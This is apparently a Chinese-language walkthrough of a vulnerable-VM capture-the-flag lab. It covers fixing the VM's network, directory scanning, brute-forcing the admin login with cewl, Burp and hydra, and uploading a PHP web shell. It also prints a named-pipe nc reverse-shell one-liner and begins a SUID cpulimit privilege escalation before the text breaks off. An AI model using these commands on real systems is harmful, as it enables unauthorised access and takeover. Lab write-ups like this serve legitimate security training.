配置
进入控制面板配置网卡
第一步:启动靶机时按下 shift 键,
- 进入以下界面

第二步:选择第二个选项,然后按下 e 键,进入编辑界面

将这里的ro修改为rw single init=/bin/bash,然后按ctrl+x,进入一个相当于控制台的界面,里面可以执行命令

ip a 查看一下实际用的网卡,这里是ens33

这里和直接的不同
20.04的ubuntu已经不用/etc/network/interfaces来设置网络了,变成在/etc/netplan下的文件来配置了
教程:Ubuntu Server 20.04 网卡启动及配置(配置前请注意文件备份)_邹霍梁@数字化企业的博客-CSDN博客
打开配置文件
bash
sudo vim /etc/netplan/00-installer-config.yaml
1
按下i进入编辑模式,修改网卡为DHCP
bash
network:
version: 2
ethernets:
eth0: # 这个以实际网卡为准
dhcp4: true
12345
修改为静态ip:
bash
network:
version: 2
ethernets:
eth0: # 这个以实际网卡为准
dhcp4: no
addresses: [192.168.1.2/24]
optional: true
gateway4: 192.168.1.1
nameservers:
addresses: [218.2.135.1,8.8.8.8]
12345678910
注意yaml对缩进和空格要求严格
应用更改
bash
sudo netplan apply
一、信息收集
获取ip
目录扫描
gobuster dir -u http://192.168.16.200/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
扫描出三个目录

二级目录扫描
gobuster dir -u http://192.168.16.200/websec -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

登录发现有一个邮箱,保存下来
http://192.168.16.200/websec/index

在http://192.168.16.200/websec/login发现登录后台页面,需要使用邮箱

二、密码爆破
1.bp爆破密码
该后台登录页面对登录请求的IP进行了限制
去掉Cookie头部字段后可以正常爆破
使用burpsuitr,抓包,默认的字典是没办法跑出来的

字典获取-工具cewl
Cewl是一款采用Ruby开发的应用程序,你可以给它的爬虫指定URL地址和爬取深度,还可以添额外的外部链接,接下来Cewl会给你返回一个字典文件。
工具源地址:【传送门】
使用cewl爬取网站信息然后生成目标网站字典文件
cewl http://192.168.16.200/websec/ > cewl.txt


导入字典重新爆破
根据收集的网站信息,邮箱[email protected]
,使用字典cewl.txt
进行爆破
成功爆破出密码 Securityx

进入管理后台了

2.hydra爆破
这里还可以使用hrdra进行爆破
hardra教程参考:
无验证码]Web页面_hydra爆破web_Yuri800的博客-CSDN博客
爆破语法:
hydra -l [email protected] -P cewl.txt 192.168.0.3 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Log In"
参数解释:
# -l 用户名
# -P 密码字典
# https-post-form、http-get-form、https-get-form -提交方式
#username=^USER^&password=^PASS^:Log In"
username=^USER^&password=^PASS^,把在network中看到的POST提交的内容只是把用户名和密码部分换成了^USER^和^PASS^。
USER对应前面的-l 后跟的用户名root,PASS会被字典中的密码逐个替换。
:Log In表示成功
POST的内容就是一个简单的键值对的形式(username=用户名&password=密码)

爆破结果:
80\]\[http-post-form\] host: 192.168.16.200 login: [email protected] password: Securityx

# 三、后门上传
进入后台后,发现文件上传点

新建php文件,插入上传一句话木马文件

可以看到后门文件上传后的路径

访问后门文件:
被禁止访问

返回查看**htaccess**配置文件
可以看到里面代码对所有 `.php` 文件执行"拒绝访问"的操作。

删除重新访问
访问中删除admin后成功
http://192.168.16.200/websec/tmp/houmen.php?cmd=id

# 四、nc反弹
抓取 后门后的数据包,修改请求为post请求

kaili开启nc监听

反弹使用:
[linux反弹备忘录 \| (moonsec.com)](https://www.moonsec.com/647.html)
[常用的一句话反弹shell总结_php一句话反弹shell_橘子女侠的博客-CSDN博客](https://blog.csdn.net/qq_38684504/article/details/90047213)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.16.180 9002 >/tmp/f
编译后执行

## 切换到bash
python -c 'import pty;pty.spawn("/bin/bash")'
# 五、第一个flag
查看网站存放的目录
www-data@hacknos:/var/www/html$ ls
ls
bg.jpg devil index.html scripts upload.php websec
www-data@hacknos:/var/www/html$ cd websec
cd websec
www-data@hacknos:/var/www/html/websec$ ls
ls
Dockerfile assets config.php log sites tmp
LICENSE composer.json index.php robots.txt src
app.yaml config.default.php lib shell.php themes
查看config.php文件内容
存放有数据库账号和密码,可以留着后面使用

查看账号保存位置
cat /etc/passwd

看到有个blackdevil用户,查看旗下的user.txt
拿到第一个flag

# 六、cpulimit提权
## 扫描suid文件
find / -perm -u=s 2>/dev/null

查找到SUID权限的命令:cpulimit
[在Ubuntu中使用cpulimit限制进程的使用率_ubuntu 离线安装 cpulimit__Slience_的博客-CSDN博客](https://blog.csdn.net/u010513756/article/details/83142716)
用法
限制firefox使用30% cpu 利用率 cpulimit -e firefox -l 30
限制进程号1313的程序使用30% cpu 利用率 cpulimit -p 1313 -l 30
限制绝对路径下该软件的 cpu 利用率cpulimit -e /usr/local/nginx/sbin/nginx -l 50
停止当前限制Ctrl + C
## 查找用户所创建的文件
find / -user 1000 2>/dev/null

## 查看当前用户可以使用的管理员命令
sudo -l

## 使用cpulimit提权
### 1.kali编写c代码
#include